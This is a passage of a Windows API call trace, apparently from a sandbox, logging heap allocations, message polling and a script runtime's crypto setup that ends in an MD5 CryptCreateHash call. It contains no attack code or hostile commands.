0x2e51d30 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0264.344] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0264.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0264.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0264.345] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0264.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.345] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0264.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0264.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.346] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.347] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.347] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.347] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.347] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0264.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.348] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.348] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.348] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.348] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0264.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0264.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.349] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0264.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0264.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0264.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0264.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.358] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.358] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.358] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.358] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.359] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.359] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.359] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.360] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0264.360] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.360] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.360] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.420] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.421] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0264.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51dc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0264.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.422] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0264.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0264.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0264.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.423] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 